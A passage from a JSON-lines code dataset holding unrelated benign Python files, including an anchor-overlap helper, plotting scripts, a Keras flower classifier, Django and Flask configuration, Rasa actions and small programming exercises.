gt_boxes[:, 3] - gt_boxes[:, 1] + 1.0\n gt_ctr_x = gt_boxes[:, 0] + 0.5 * gt_widths\n gt_ctr_y = gt_boxes[:, 1] + 0.5 * gt_heights\n\n targets_dx = (gt_ctr_x - anchor_ctr_x) / anchor_widths\n targets_dy = (gt_ctr_y - anchor_ctr_y) / anchor_heights\n targets_dw = np.log(gt_widths / anchor_widths)\n targets_dh = np.log(gt_heights / anchor_heights)\n\n targets = np.stack((targets_dx, targets_dy, targets_dw, targets_dh))\n targets = targets.T\n\n return targets\n\n\ndef compute_overlap(a, b):\n \"\"\"\n Parameters\n ----------\n a: (N, 4) ndarray of float\n b: (K, 4) ndarray of float\n Returns\n -------\n overlaps: (N, K) ndarray of overlap between boxes and query_boxes\n \"\"\"\n area = (b[:, 2] - b[:, 0] + 1) * (b[:, 3] - b[:, 1] + 1)\n\n iw = np.minimum(np.expand_dims(a[:, 2], axis=1), b[:, 2]) - np.maximum(np.expand_dims(a[:, 0], 1), b[:, 0]) + 1\n ih = np.minimum(np.expand_dims(a[:, 3], axis=1), b[:, 3]) - np.maximum(np.expand_dims(a[:, 1], 1), b[:, 1]) + 1\n\n iw = np.maximum(iw, 0)\n ih = np.maximum(ih, 0)\n\n ua = np.expand_dims((a[:, 2] - a[:, 0] + 1) * (a[:, 3] - a[:, 1] + 1), axis=1) + area - iw * ih\n\n ua = np.maximum(ua, np.finfo(float).eps)\n\n intersection = iw * ih\n\n return intersection / ua\n","sub_path":"keras_retinanet/preprocessing/anchors.py","file_name":"anchors.py","file_ext":"py","file_size_in_byte":6005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"508698620","text":"import numpy as np\nfrom scipy import optimize \nimport matplotlib.pyplot as plt\nfrom pylab import *\nfrom matplotlib.ticker import AutoMinorLocator, AutoLocator\nrc('font', family = 'serif', serif = 'STIXGeneral')\n# ------------------ Eingaben ------------\nAlle_Daten_plotten = True #True\nEinen_Datensatz_schoen_plotten = False\nread_start=14 # Erste Zeile, die eingelesen wird\nabgelesene_Werte_plotten = False #False \n# ------------------------------------------\n\n# txt_filename_to_open=[\"05-phasenraum-045mV-minmax-FM.dat\"]\n\n# data1 = [i.strip().split() for i in open(txt_filename_to_open[0]).readlines()]\nex_data=[i.strip().split() for i in open(\"360DrehungEx_von_Mathematica.dat\").readlines()]\ntheo_data=[i.strip().split() for i in open(\"360DrehungTheo_von_Mathematica.dat\").readlines()]\n\nx1=[]; x2=[]; y1=[]; y2=[]\n\nfor i in range(len(ex_data)):\n x1=append(x1,float(ex_data[i][0])) \n y1=append(y1,float(ex_data[i][1]))\n\nfor i in range(len(theo_data)):\n x2=append(x2,float(theo_data[i][0])) \n y2=append(y2,float(theo_data[i][1])) \n \nplt.figure(0)\nplt.xlabel(u\"Frequenz [Hz]\")\nplt.ylabel(u\"Signal [arb.u.]\")\ntitle(\"Frequenzsweep mit 90mV Einstrahlspannung\")\nfont = {'family' : 'serif',\n 'weight' : 'normal',\n 'size' : 20}\n#plt.xlim([0.049,0.0885])\n#plt.ylim([-1,1.5])\nmatplotlib.rc('font', **font)\nsubplots_adjust(left=0.18, bottom=0.12, right=0.96, top=0.92, wspace=0.2, hspace=0.2)\n# plt.plot(t1,S1,\"b.\", label=\"off\")\nplt.plot(x1,y1,\"r.\", label=\"Messpunkte\")\nplt.plot(x2,y2,\"b.\", label=\"Theoretisch erwarteter Verlauf\")\n#plt.plot([1300,1700],[0.1721,0.1721],\"k--\")\ns=0.05\n#plt.plot([1477,1477,1477,1544,1544,1544],[0.0035-s,0.0035+s,0.0035,0.0035,0.0035-s,0.0035+s],\"r\")\n#plt.text(1510,-0.1,r'$\\nu_\\mathrm{Halb}$',va=\"center\",ha=\"center\",color=\"red\")\n# plt.plot([0,1],[0,0],\"k--\")\n\nplt.legend(loc=1)\t\nshow()\n","sub_path":"NMR/Data-Plots/13-Halbwertsfrequenz-360.py","file_name":"13-Halbwertsfrequenz-360.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"165439028","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"======================================================================\"\"\"\n\"\"\"IDE used: Spyder\n Python 3.6.4 on Anaconda3\"\"\"\n#============================================================================\n\"\"\"\nCreated on Mon Apr 2 00:59:13 2018\n\nDue Date: Thursday April 05 23:59 2018\n\n@author: Alem Haddush Fitwi\nEmail:afitwi1@binghamton.edu\nNeural Network & Deep Learning - EECE680C\nDepartment of Electrical & Computer Engineering\nWatson Graduate School of Engineering & Applied Science\nThe State University of New York @ Binghamton\n\"\"\"\n#============================================================================\n\"\"\"\nTerse Assignment Description:\nDesign a CNN classifier for flower classification. The data sets consists of 3\ntypes of lowers, each has 80 images. 70 images per flower are training, and 10\n images per flower are testing.\n\"\"\"\n#============================================================================\n\"\"\"\nStep_0: Laconic Description of the solution Program Organization\nIt comprises three classes, namely\n 1) Class InputImages: handles preliminary image iputing & processing\n 2) Class CNN_Model: creates the CNN training models & Makes prediction\n 3) Class Testing: handles the calling and testing of all other classes\n\"\"\"\n#============================================================================\n#----------------------------------------------------------------------------\n\"\"\"\nStep_1: Importing Required Packages or keras modules:\n\"\"\"\n#----------------------------------------------------------------------------\nimport scipy.io\nimport scipy.misc\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D\nfrom keras.layers import MaxPooling2D\nfrom keras.layers import Flatten\nfrom keras.layers import Dense\nfrom keras.preprocessing.image import ImageDataGenerator\n#============================================================================\n#----------------------------------------------------------------------------\n\"\"\"\nStep_2: Constructing the Class 'InputImages': \"\"\" \n#---------------------------------------------------------------------------- \nclass InputImages:\n def extractTestImages(self,Path_1,Path_2,Path_3,X_test):\n self.Path_1=Path_1\n self.Path_2=Path_2\n self.Path_3=Path_3\n self.X_test=X_test\n for flower in range(len(self.X_test)):\n if flower < 10:\n name=\"yellow\"+str(flower)+\".\"+\"jpg\"\n image_yellow=self.X_test[flower] \n scipy.misc.imsave(self.Path_1+name, image_yellow)\n if flower >=10 and flower<20:\n name=\"white\"+str(flower)+\".\"+\"jpg\"\n image_yellow=self.X_test[flower] \n scipy.misc.imsave(self.Path_2+name, image_yellow)\n if flower >= 20 and flower < 30:\n name=\"pink\"+str(flower)+\".\"+\"jpg\"\n image_yellow=self.X_test[flower] \n scipy.misc.imsave(self.Path_3+name, image_yellow)\n #------------------------------------------------------------------------\n def extractTrainingImages(self,Path_4,Path_5,Path_6,X_train):\n self.Path_4=Path_4\n self.Path_5=Path_5\n self.Path_6=Path_6\n self.X_train=X_train\n for flower in range(len(self.X_train)):\n if flower < 70:\n name=\"yellow\"+str(flower)+\".\"+\"jpg\"\n image_yellow=self.X_train[flower] \n scipy.misc.imsave(self.Path_4+name, image_yellow)\n if flower >=70 and flower<140:\n name=\"white\"+str(flower)+\".\"+\"jpg\"\n image_yellow=self.X_train[flower] \n scipy.misc.imsave(self.Path_5+name, image_yellow)\n if flower >= 140 and flower < 210:\n name=\"pink\"+str(flower)+\".\"+\"jpg\"\n image_yellow=self.X_train[flower] \n scipy.misc.imsave(self.Path_6+name, image_yellow)\n#============================================================================\n#----------------------------------------------------------------------------\n\"\"\"\nStep_3: Constructing the 'Class CNN_Model' using keras: \"\"\" \n \n#---------------------------------------------------------------------------- \nclass CNN_Model:\n def createCNNModel():\n #--------------------------------------------------------------------\n # Part 1 - Building the CNN\n #--------------------------------------------------------------------\n # Initialising the CNN\n classifier = Sequential()\n # Step 1 - Convolution\n classifier.add(Conv2D(32, (3, 3), input_shape = (128, 128, 3), \n activation = 'relu'))\n # Step 2 - Pooling\n classifier.add(MaxPooling2D(pool_size = (2, 2)))\n # Adding a second convolutional layer\n classifier.add(Conv2D(32, (3, 3), activation = 'relu'))\n classifier.add(MaxPooling2D(pool_size = (2, 2)))\n # Step 3 - Flattening\n classifier.add(Flatten())\n # Step 4 - Full connection\n classifier.add(Dense(units = 128, activation = 'relu'))\n classifier.add(Dense(units = 1, activation = 'sigmoid'))\n # Compiling the CNN\n classifier.compile(optimizer = 'adam', loss = 'binary_crossentropy', \n metrics = ['accuracy'])\n #--------------------------------------------------------------------\n # Part 2: Fitting the CNN to the images\n #--------------------------------------------------------------------\n train_datagen = ImageDataGenerator(rescale = 1./255,\n shear_range = 0.2,\n zoom_range = 0.2,\n horizontal_flip = True)\n test_datagen = ImageDataGenerator(rescale = 1./255)\n training_set = train_datagen.flow_from_directory('dataset/training_set',\n target_size = (128, 128),\n batch_size = 32,\n class_mode = 'binary')\n test_set = test_datagen.flow_from_directory('dataset/test_set',\n target_size = (128, 128),\n batch_size = 32,\n class_mode = 'binary')\n classifier.fit_generator(training_set,\n steps_per_epoch = 210,\n epochs = 5,\n validation_data = test_set,\n validation_steps = 30)\n print(\"-------------------****************-------------------------\")\n print(\"-------------------Traning is over--------------------------\") \n print(\"************************************************************\") \n\n#============================================================================\n#----------------------------------------------------------------------------\n\"\"\"\nStep_4: Constructing the 'class Test': \n\"\"\" \n#----------------------------------------------------------------------------\nclass Test:\n #Reading the innput image which is in .mat format\n im=\"imagedata.mat\"\n dataset= scipy.io.loadmat(im)\n X_test = scipy.io.loadmat(im, variable_names='Xtest').get('Xtest')\n X_train= scipy.io.loadmat(im, variable_names='Xtrain').get('Xtrain')\n Y_test = scipy.io.loadmat(im, variable_names='Ytest').get('Ytest')\n Y_train = scipy.io.loadmat(im, variable_names='Ytrain').get('Ytrain')\n #Extarct test image of each flower type and save them in separet folders\n Path_1=\"dataset/test_set/yellow_flower/\"\n Path_2=\"dataset/test_set/white_flower/\"\n Path_3=\"dataset/test_set/pink_flower/\"\n #Extarct training image of each flower type and save them in d/t folders\n Path_4=\"dataset/training_set/yellow_flower/\"\n Path_5=\"dataset/training_set/white_flower/\"\n Path_6=\"dataset/training_set/pink_flower/\"\n # Instantiating Class InputImages\n class_input_o_1=InputImages() \n class_input_o_2=InputImages()\n # Instantiating Class CNN_Model \n class_CNN_o_1=CNN_Model\n #Calling methods of the classes\n class_input_o_1.extractTestImages(Path_1,Path_2,Path_3,X_test)\n class_input_o_2.extractTrainingImages(Path_4,Path_5,Path_6,X_train)\n print(\"-------------------****************-------------------------\")\n print(\"------------------Traning is running------------------------\") \n print(\"************************************************************\") \n prediction=class_CNN_o_1.createCNNModel()\n#============================================================================\n\"\"\" End of Program! \"\"\"\n#----------------------------------------------------------------------------","sub_path":"Assignments/Homework_3/EX_12.1_Flowers/Ex_12.1_flowers_Classication.py","file_name":"Ex_12.1_flowers_Classication.py","file_ext":"py","file_size_in_byte":8874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"301629038","text":"from setuptools import setup, find_packages\n\n\n\nclassifiers = []\nwith open(\"classifiers.txt\") as fd:\n classifiers = fd.readlines()\n\n\nsetup(\n name=\"drivedroid-gen-repo\",\n version=\"0.4.4\",\n description=\"Generator for drivedroid repository files\",\n author=\"Felix Richter\",\n author_email=\"github@syntax-fehler.de\",\n url=\"http://github.com/makefu/drivedroid-repo-gen\",\n license=\"wtfpl\",\n classifiers=classifiers,\n packages=find_packages(),\n entry_points = {\n 'console_scripts' :\n ['drivedroid-gen-repo = drivedroid_gen:main'],\n },\n install_requires=['docopt'],\n)\n","sub_path":"pypi_install_script/drivedroid-gen-repo-0.4.4.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"31153309","text":"import gym\r\nimport tensorflow as tf\r\n\r\nfrom stable_baselines.common.policies import MlpPolicy\r\nfrom stable_baselines.common.vec_env import DummyVecEnv\r\nfrom stable_baselines import PPO2\r\nimport os\r\n\r\ninner_env = None\r\n\r\n\r\ndef run(learning_steps=4300):\r\n global inner_env\r\n inner_env = gym.make('gym_threshold:threshold-intra_process-extended-space-v0')\r\n env = DummyVecEnv([lambda: inner_env])\r\n\r\n model = PPO2(MlpPolicy, env, verbose=1, n_steps=128, nminibatches=4,\r\n tensorboard_log=\"tensorboard\")\r\n model.learn(total_timesteps=learning_steps, tb_log_name=os.path.basename(__file__).rstrip(\".py\"),\r\n callback=tensorboard_callback)\r\n\r\n env.close()\r\n\r\n\r\ndef tensorboard_callback(locals_, globals_):\r\n global inner_env\r\n self_ = locals_['self']\r\n if inner_env.summary_writer is None:\r\n inner_env.summary_writer = locals_['writer']\r\n\r\n return True\r\n\r\n\r\nif __name__ == \"__main__\":\r\n run(2000000)\r\n","sub_path":"python_src/experiments/deprecated/ppo2_mlp_defaultpara_intraenv_extended_space.py","file_name":"ppo2_mlp_defaultpara_intraenv_extended_space.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"322336869","text":"\r\n# Загружаем рецепты в dict\r\n\r\npath = 'F:/task2/'\r\n\r\ndishes = {}\r\nwith open(f'{path}recipes.txt', 'rb') as f:\r\n for a in f:\r\n name, ings = a.decode().strip('\\n').strip('\\r').split(':')\r\n dishes[name] = ings.split(',')\r\n \r\n# Загружаем доступные ингредиенты\r\nn = int(input())\r\nings = [str(input()) for a in range(n)]\r\n\r\n# Просто list comprehension: берем элемент при условии, \r\n# что наши ингредиенты в пересечении с требуемыми равны требуемым.\r\n\r\nwhat_we_can = [dish for dish in dishes \\\r\n if set(ings).intersection(dishes[dish]) == set(dishes[dish])]\r\n\r\n# Просто вывод\r\n\r\nprint('Вы можете приготовить:\\n' + '\\n'.join(what_we_can) if len(what_we_can) > 0 else \\\r\n 'Не найдены блюда, которые можно приготовить из данных ингредиентов :(')","sub_path":"Task2.py","file_name":"Task2.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"261456112","text":"class Solution(object):\n def maxSubArray(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n n = len(nums)\n \n tmpsum = max(nums[0], 0)\n maxsum = nums[0]\n \n for i in range(1,n):\n tmpsum += nums[i]\n maxsum = max(tmpsum, maxsum)\n tmpsum = max(tmpsum, 0)\n \n return maxsum \n","sub_path":"Solutions/Array/#053. Maximum Subarray.py","file_name":"#053. Maximum Subarray.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"8736360","text":"from flask_sqlalchemy import SQLAlchemy\n\ndb= SQLAlchemy()\n\nDEFAULT_IMAGE_URL = \"https://tinyurl.com/truffle-cupcake\"\n\ndef connect_db(app):\n \"\"\" Connects to database \"\"\"\n\n db.app = app\n db.init_app(app)\n\nclass Cupcake(db.Model):\n \"\"\"model for cupcakes\"\"\"\n\n __tablename__ = \"cupcakes\"\n\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n flavor = db.Column(db.Text, nullable=False)\n size = db.Column(db.Text, nullable=False)\n rating = db.Column(db.Float, nullable=False)\n image = db.Column(db.String(300), default=DEFAULT_IMAGE_URL)","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"298949844","text":"#!/usr/bin/env python3\nimport numpy as np\nimport pandas as pd\n'''\n1.4.9 함수\n'''\ndef getMean(numbericValues):\n return sum(numbericValues)/len(numbericValues) if len(numbericValues) > 0 else float('nan')\nyour_list = [75, 80, 90, 95, 60, 72, 88, 92, 84, 72]\ndataframe = pd.DataFrame(your_list)\nprint(\"Output function : {!s}\".format(getMean(your_list)))\nprint(\"Output numpy.mean : {}\".format(np.mean(your_list)))\nprint(\"Output pandas.mean : {}\\n\".format(dataframe.mean()))\n\n'''\n1.4.10 예외\n- 85쪽, try-except\n- 86쪽, try-except-else-finally을 테스트 해# 보세요.\n'''\n# 숫자 시퀀스의 평균 계산하기\ndef getMean(numericValues):\n return sum(numericValues)/len(numericValues)\n\nmy_list2 = [ ]\n\n# 짧은 버전\ntry:\n print(\"Output : {}\".format(getMean(my_list2)))\nexcept ZeroDivisionError as detail:\n print(\"Output (Error): {}\".format(float('nan')))\n print(\"Output (Error): {}\\n\".format(detail))\n\n# 긴 버전\ntry:\n result = getMean(my_list2)\nexcept ZeroDivisionError as detail:\n print(\"Output (Error): {}\".format(float('nan')))\n print(\"Output (Error): {}\".format(detail))\nelse:\n print(\"Output (The mean is) : {}\".format(result))\nfinally:\n print(\"Output (Finally) : The finally block is executed every time\")\n'''\n1.5 텍스트 파일 읽기\n※ 데이터 분석을 하려면 외부의 파일을 읽어 들입니다.\n- 86쪽부터 91쪽까지 예제대로 테스트하기 바랍니다.\n'''\n\n#!/usr/bin/env python3\nfrom math import exp, log, sqrt\nimport re\nfrom datetime import date, time, datetime, timedelta\nfrom operator import itemgetter\nimport sys\n\n#파일 읽기\n#하나의 텍스트 파일 읽기\nprint(\"Output : \")\n#input_file = sys.argv[1]\ninput_file = \"src/test01.txt\"\nfilereader = open(input_file, 'r')\nfor row in filereader:\n print(row.strip())\nfilereader.close()\n\nprint(\"\\nOutput : \")\nwith open(input_file, 'r', newline='') as filereader:\n for row in filereader:\n print(\"{}\".format(row.strip()))\n\n'''\n1.6 glob을 이용해 다수의 텍스트 파일 읽기\n※ 데이터 분석을 위해서 여러 파일을 읽어 들이는 일이 있습니다.\n- 91쪽부터 95쪽까지 예제대로 테스트를 해 보세요.\n'''\n\n#!/usr/bin/env python3\nfrom math import exp, log, sqrt\nimport re\nfrom datetime import date, time, datetime, timedelta\nfrom operator import itemgetter\nimport sys\nimport glob\nimport os\n\n#다수의 파일 읽기\nprint(\"Output : \")\n#inputPath = sys.argv[1]\ninputPath = \"src\"\nfor input_file in glob.glob(os.path.join(inputPath,'*.txt')):\n with open(input_file, 'r', newline='') as filereader:\n for row in filereader:\n print(\"{}\".format(row.strip()))\n\n\n'''\n1.7 텍스트 파일 쓰기\n※ 데이터 분석에서 대부분의 출력 결과는 파일에 씁니다.\n- 95쪽부터 99쪽까지 파일 쓰기 방법을 테스트 해 보세요.\n'''\n\n#파일 작성하기\n#하나의 텍스트 파일 작성하기\nmy_letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j']\nmax_index = len(my_letters)\n#output_file = sys.argv[1]\noutput_file = \"src/write_to_file.txt\"\nfilewriter = open(output_file, 'w')\nfor index_value in range(len(my_letters)):\n if index_value < (max_index-1) :\n filewriter.write(my_letters[index_value]+'\\t')\n else:\n filewriter.write(my_letters[index_value]+'\\n')\nfilewriter.close()\nprint(\"\\nOutput : Output written to file\")\n\n# CSV 파일 작성하기\nmy_numbers = [0,1,2,3,4,5,6,7,8,9]\nmax_index = len(my_letters)\noutput_file = \"src/write_to_file.txt\"\nfilewriter = open(output_file, 'a')\nfor index_value in range(len(my_numbers)):\n if index_value < (max_index-1):\n filewriter.write(str(my_numbers[index_value])+',')\n else:\n filewriter.write(str(my_numbers[index_value])+'\\n')\nfilewriter.close()\nprint(\"Output : Output appended to file\")\n\n","sub_path":"Assignment/Assignment_04.py","file_name":"Assignment_04.py","file_ext":"py","file_size_in_byte":3796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"291172690","text":"#!/usr/bin/python3\n\nimport random\n\na=random.randint(0,9)\ncount=0\nwhile True:\n ch=input(\"Enter your choice\")\n if(ch==\"exit\"):\n break\n else:\n count+=1\n if(aint(ch)):\n print(\"Low\")\n else:\n print(\"Awesome you found the number in {} guess\".format(count))\n","sub_path":"python/practice/guessing_game.py","file_name":"guessing_game.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"267215210","text":"#REDDIT CHALLENGE EXERCISE 3\n'''Welcome to cipher day!\nwrite a program that can encrypt texts with an alphabetical caesar cipher.\nThis cipher can ignore numbers, symbols, and whitespace. for extra credit,\nadd a \"decrypt\" function to your program!'''\n\ndef cipher(message, key, encryptdecrypt):\n if encryptdecrypt.lower().startswith('d'):\n key = -key\n else:\n pass \n for symbol in message:\n if symbol.isalpha():\n if symbol.isupper():\n newsymbol = ord(symbol) + key\n if newsymbol > 90:\n print(chr(newsymbol - 26,),end='')\n elif newsymbol < 65:\n print(chr(newsymbol + 26,),end='')\n else:\n print(chr(newsymbol),end='')\n if symbol.islower():\n newsymbol = ord(symbol) + key\n if newsymbol > 122:\n print(chr(newsymbol - 26),end='')\n elif newsymbol < 97:\n print(chr(newsymbol + 26),end='')\n else:\n print(chr(newsymbol),end='' ) \n else:\n print(symbol)\n \n \ndef main():\n cipher('zzzzzz AAAAAA', 1, 'encrypt')\n\nif __name__ == \"__main__\":\n main()\n \n \n","sub_path":"Easy_Challenges/Easy1to10/easy3.py","file_name":"easy3.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"39796576","text":"\"\"\"\nQ589\nN-ary Tree Preorder Traversal\nEasy\n\nGiven an n-ary tree, return the preorder traversal of its\nnodes' values.\n\nNary-Tree input serialization is represented in their level\norder traversal, each group of children is separated by the\nnull value (See examples).\n\n\nFollow up:\nRecursive solution is trivial, could you do it iteratively?\n\n\"\"\"\n\nfrom typing import List\n\n# Definition for a Node.\nclass Node:\n def __init__(self, val=None, children=None):\n self.val = val\n self.children = children\n\nclass Solution:\n def preorder(self, root: 'Node') -> List[int]:\n\n if root is None:\n return []\n\n stack = [root]\n\n preo = []\n\n while stack:\n current = stack.pop()\n preo.append(current.val)\n children = current.children\n while children:\n stack.append(children.pop())\n\n return preo\n\n","sub_path":"Q589.py","file_name":"Q589.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"154122852","text":"# coding: utf-8\nfrom django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom core.forms import TypeForm, RegionForm, DistinctForm, CityForm, PlaceForm, OwnerForm, MarchentForm, ContainerForm\nfrom core.models import Container, Region, Distinct, City, Place, Owner, Marchent, Type\n\nurlpatterns = patterns('',\n # Examples:\n url(r'^$', 'app.dictionary.get_list', {'model': Container, 'template': 'containers.html'}),\n\n url(r'^login$', 'app.views.login_form'),\n url(r'^register', 'app.views.register'),\n url(r'^logout', 'app.views.log_out'),\n\n url(r'^dictionary/regions', 'app.dictionary.get_list',\n {'model': Region, 'template': 'regions.html'}),\n\n url(r'^dictionary/distincts', 'app.dictionary.get_list',\n {'model': Distinct, 'template': 'disctincts.html'}),\n\n url(r'^dictionary/cities', 'app.dictionary.get_list',\n {'model': City, 'template': 'cities.html'}),\n\n url(r'^dictionary/places', 'app.dictionary.get_list',\n {'model': Place, 'template': 'places.html'}),\n\n url(r'^dictionary/owners', 'app.dictionary.get_list',\n {'model': Owner, 'template': 'owners.html'}),\n\n url(r'^dictionary/marchents', 'app.dictionary.get_list',\n {'model': Marchent, 'template': 'marchents.html'}),\n\n url(r'^dictionary/types', 'app.dictionary.get_list', {'model': Type, 'template': 'types.html'}),\n\n url(r'^dictionary/type', 'app.dictionary.get_form',\n {'model': Type, 'name': 'Новий тип', 'model_form': TypeForm, 'back': 'types',\n 'now': 'type'}),\n\n url(r'^dictionary/region', 'app.dictionary.get_form',\n {'model': Region, 'name': 'Нова область', 'model_form': RegionForm, 'back': 'regions',\n 'now': 'region'}),\n\n url(r'^dictionary/distinct', 'app.dictionary.get_form',\n {'model': Distinct, 'name': 'Новий район', 'model_form': DistinctForm, 'back': 'distincts',\n 'now': 'distinct'}),\n\n url(r'^dictionary/city', 'app.dictionary.get_form',\n {'model': City, 'name': 'Нове місто', 'model_form': CityForm, 'back': 'cities',\n 'now': 'city'}),\n\n url(r'^dictionary/place', 'app.dictionary.get_form',\n {'model': Place, 'name': 'Нове місце', 'model_form': PlaceForm, 'back': 'places',\n 'now': 'place'}),\n\n url(r'^dictionary/owner', 'app.dictionary.get_form',\n {'model': Owner, 'name': 'Новий власник', 'model_form': OwnerForm, 'back': 'owners',\n 'now': 'owner'}),\n\n url(r'^dictionary/marchent', 'app.dictionary.get_form',\n {'model': Marchent, 'name': 'Новий орендар', 'model_form': MarchentForm, 'back': 'marchents',\n 'now': 'marchent'}),\n\n url(r'^dictionary/container', 'app.dictionary.get_form',\n {'model': Container, 'name': 'Новий контейнер', 'model_form': ContainerForm, 'back': '../',\n 'now': 'container'}),\n\n url(r'^export/(?P\\w+)', 'app.dictionary.export'),\n url(r'^info/owner/(?P\\d+)', 'app.dictionary.info', {'model': Owner}),\n url(r'^info/marchent/(?P\\d+)', 'app.dictionary.info', {'model': Marchent}),\n\n url(r'^filter$', 'app.dictionary.filter'),\n\n url(r'^admin/', include(admin.site.urls)),\n )\n","sub_path":"Kursova/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"325138033","text":"from rasa_core_sdk import Action\r\nfrom rasa_core_sdk.events import SlotSet\r\nfrom rasa_core_sdk.events import UserUtteranceReverted\r\nfrom snlu_api import snlu_api\r\nfrom request import request_nlu\r\nimport json\r\nfrom rasa_core.trackers import DialogueStateTracker\r\nimport rasa_core.events\r\nfrom rasa_core.conversation import Dialogue\r\n\r\ndef get_entity_value():\r\n lines = open('entity_mapping.txt', 'r')\r\n entities = {}\r\n for line in lines:\r\n data = line.replace('\\n',\"\").split(',')\r\n entities[data[0]] = data[1]\r\n return entities\r\n\r\ndef parse_nlu_output(data):\r\n spacy = False\r\n if data['intent']['name'] == 'inform' and len(data['entities']) > 0 :\r\n for entity in data['entities'] :\r\n if entity['extractor'] == 'ner_spacy' :\r\n spacy = True\r\n spacy_value = entity['value']\r\n elif entity['extractor'] == 'ner_crf' :\r\n crf_value = entity['value']\r\n crf_confidence = entity['confidence']\r\n\r\n if spacy :\r\n return [ spacy_value, 0.0 ]\r\n else: \r\n return [ crf_value, crf_confidence ]\r\n \r\n else:\r\n\t return [\"error. data not recognized\", 0.0]\r\n\r\n\r\nclass ActionSNLU(Action):\r\n def name(self):\r\n return \"ActionSNLU\"\r\n \r\n def run(self, dispatcher, tracker, domain):\r\n #get the latest user utterance and pass it\r\n #with the tracker for the Special NLU processing\r\n #print('invoked ActionSNLU')\r\n user_message = tracker.latest_message.get('text')\r\n #print('user message is ', user_message)\r\n \"\"\" for event in tracker.events:\r\n print(event.keys())\r\n print(event.get('event'))\r\n try:\r\n print(event.get('name'))\r\n except:\r\n print(event.get('text')) \"\"\"\r\n nlu_output, utter_action = snlu_api(user_message, tracker)\r\n print(nlu_output)\r\n #get a dictionary of questions (utter_action) and answers (entity in the output)\r\n entities = get_entity_value()\r\n slot = entities[utter_action]\r\n ##now parse nlu_output to find out the entity\r\n entity_value, entity_confidence = parse_nlu_output(nlu_output)\r\n return [SlotSet(slot, entity_value)]\r\n\r\n","sub_path":"actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"461813745","text":"#!/usr/local/bin/python\n# coding: utf-8\n\nfrom django.contrib import admin\n# from django.utils.translation import ugettext_lazy as _\n\nfrom .models import Mensaje\n\n\nclass MensajeAdmin(admin.ModelAdmin):\n list_display = (\n 'id_str',\n 'directo',\n 'screen_name',\n 'name',\n 'lat',\n 'lon',\n 'text'\n )\n list_filter = ('directo', 'located', 'atendido_por', 'abuso')\n\n search_fields = ('screen_name',)\n ordering = ('id_int',)\n\nadmin.site.register(Mensaje, MensajeAdmin)\n","sub_path":"alertas123/cliente/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"126307229","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 25 21:58:22 2018\n\n@author: Александр\n71\"\"\"\nfrom .planList import PlanList\n\nplanList = PlanList()\nMENU = [\n [\"Добавить основной учебный план\", planList.addBasePlan],\n [\"Добавить расширенный учебный план\", planList.addExtendedPlan],\n [\"Вывести весь список на экран\", planList.printElements],\n [\"Очистить список\", planList.eraseElements],\n [\"Вывести список в файл\", planList.printToFile],\n [\"Загрузить список из файла\", planList.downloadElementsFromFile],\n [\"Редактировать план\", planList.editPlan]\n\t]\n\n\ndef menu():\n\tprint(\"------------------------------\")\n\tfor i, item in enumerate(MENU):\n\t\tprint(\"{0:2}. {1}\".format(i+1, item[0]))\n\tprint(\"------------------------------\")\n\treturn int(input())\n\n \ndef main():\n try:\n \twhile True:\n \t\tMENU[menu()-1][1]()\n except Exception as ex:\n \tprint(ex, \"\\nbye\")\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"st39/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"335788948","text":"import argparse\n\nimport pyqtgraph as pg\nfrom pyqtgraph.Qt import QtCore, QtGui\n\nfrom . import get_scope_window\nfrom ..utils.display_exception import activate_error_dialog\n\n\ndef create_parser(parser=None):\n if parser is None:\n parser = argparse.ArgumentParser(description='Programme pour visualiser un scope')\n parser.add_argument('--test', action='store_true', help='Use to test unconnected instrument')\n parser.add_argument('--plot_engine', default='pyqtgraph', help='Engine to do the plots', choices=['mpl', 'pyqtgraph'])\n return parser\n\ndef main(args=None):\n if not isinstance(args, argparse.Namespace):\n parser = create_parser()\n args = parser.parse_args(args)\n 